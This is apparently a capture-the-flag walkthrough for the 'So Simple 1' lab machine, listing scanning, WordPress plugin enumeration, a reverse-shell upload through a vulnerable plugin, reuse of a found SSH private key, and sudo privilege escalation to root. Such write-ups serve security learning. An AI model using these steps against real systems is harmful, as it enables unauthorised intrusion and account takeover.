So Simple 1 Walkthrough

We start by scanning the host with “nmap -A -T4 -p- 192.168.1.11 -vv”:

Port 80 is open, so we scan it with “dirb http://192.168.1.18 /usr/share/dirb/wordlist/big.txt”:

The box is running WordPress service, we can enumerate for plugins and see what we got:

wpscan –url http://192.168.1.18/wordpress -e ap

We got two plugins (simple-cart-solution) and (social-warfare), searching online for exploits i got this webpage for “social-soluion” vulnerability HERE and HERE:

Now we need to start a simple server on our machine to upload the shell to the target:

python -m SimpleHTTPServer 8080

What i did here is started the simple server and copied the exploit and put my IP address at the end of the command along with the shell file that i want to run “rshell.php”, then we head to http://192.168.1.18/wordpress/wp-admin/rshell.php

And start a listening port, you will get a shell back:

The fires file i opened is personal.txt it’s a base64 code and when we decode it:

We have .ssh folder where we can find id_rsa file:

Copy it, save it, and we can ssh with it:

chmod 600 keys.txt

ssh max@192.168.1.11 -i keys.txt

Max flag file

Now max can run “sudo -l”

sudo -u steven service ../../bin/sh

Steven flag file

Also, Steven can run “sudo -l”

But first the path /opt/tools/server-health.sh doesn’t exist, just creat it and inside the file server-health.sh just put:

Run it with sudo -u root /opt/tools/server-health.sh

And you root

Root flag file

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s